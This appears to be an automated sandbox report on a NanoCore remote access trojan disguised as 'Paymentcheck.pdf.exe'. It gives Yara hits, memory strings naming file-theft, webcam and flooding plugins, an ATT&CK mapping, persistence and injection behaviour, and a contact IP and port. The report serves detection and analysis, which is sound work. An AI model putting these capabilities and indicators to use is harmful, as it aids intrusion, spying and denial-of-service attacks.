Source: Yara matchFile source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR

Remote Access Functionality:

barindex
Detected Nanocore RatShow sources
Source: Paymentcheck.pdf.exe, 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegAsm.exe, 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture11System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting111Scheduled Task/Job1Process Injection212Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScheduled Task/Job1Registry Run Keys / Startup Folder11Scheduled Task/Job1Scripting111Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Registry Run Keys / Startup Folder11Obfuscated Files or Information13NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsSecurity Software Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading12Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion21/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection212Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 458302 Sample: Paymentcheck.pdf.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 59 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Multi AV Scanner detection for dropped file 2->63 65 13 other signatures 2->65 8 Paymentcheck.pdf.exe 3 9 2->8         started        12 RegAsm.exe 2 2->12         started        14 dhcpmon.exe 2->14         started        16 dhcpmon.exe 2->16         started        process3 file4 49 C:\Users\user\AppData\...\msbuildd.exe, PE32 8->49 dropped 51 C:\Users\user\AppData\Local\Temp\RegAsm.exe, PE32 8->51 dropped 53 C:\Users\...\msbuildd.exe:Zone.Identifier, ASCII 8->53 dropped 55 2 other malicious files 8->55 dropped 71 Creates an undocumented autostart registry key 8->71 73 Writes to foreign memory regions 8->73 75 Injects a PE file into a foreign processes 8->75 18 RegAsm.exe 1 14 8->18         started        23 wscript.exe 1 8->23         started        25 conhost.exe 12->25         started        27 conhost.exe 14->27         started        29 conhost.exe 16->29         started        signatures5 process6 dnsIp7 57 217.138.212.57, 2018, 49771 M247GB United Kingdom 18->57 43 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 18->43 dropped 45 C:\Users\user\AppData\Local\...\tmp715E.tmp, XML 18->45 dropped 47 C:\Program Files (x86)\...\dhcpmon.exe, PE32 18->47 dropped 67 Uses schtasks.exe or at.exe to add and modify task schedules 18->67 31 schtasks.exe 1 18->31         started        33 schtasks.exe 1 18->33         started        69 Wscript starts Powershell (via cmd or directly) 23->69 35 powershell.exe 9 23->35         started        file8 signatures9 process10 process11 37 conhost.exe 31->37         started        39 conhost.exe 33->39         started        41 conhost.exe 35->41         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Paymentcheck.pdf.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe100%Joe Sandbox ML
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%VirustotalBrowse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%MetadefenderBrowse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\RegAsm.exe0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\RegAsm.exe0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\RegAsm.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe33%ReversingLabsByteCode-MSIL.Downloader.Seraph

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
13.2.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
13.2.RegAsm.exe.5210000.21.unpack100%AviraTR/NanoCore.fadteDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.fontbureau.comV0%Avira URL Cloudsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://www.fontbureau.coma0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
http://fontfabrik.com0%URL Reputationsafe
http://www.fontbureau.comgrita0%URL Reputationsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.fontbureau.comttva0%Avira URL Cloudsafe
http://www.sakkal.com0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.apache.org/licenses/LICENSE-2.0Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpfalse
    		high
    http://www.fontbureau.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
      		high
      http://www.fontbureau.com/designersGPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
        		high
        http://www.fontbureau.com/designers/?Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
          		high
          http://www.founder.com.cn/cn/bThePaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpfalse
            		high
            http://www.fontbureau.com/designers?Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
              		high
              http://www.tiro.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.fontbureau.comVPaymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.fontbureau.com/designersPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                		high
                http://www.goodfont.co.krPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://google.comRegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.comaPaymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.933111295.0000000004BAB000.00000004.00000001.sdmpfalse
                    		high
                    http://www.carterandcone.comlPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/cabarga.htmlNPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/cThePaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.galapagosdesign.com/staff/dennis.htmPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://fontfabrik.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.comgritaPaymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cnPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/frere-user.htmlPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                        		high
                        http://www.jiyu-kobo.co.jp/Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
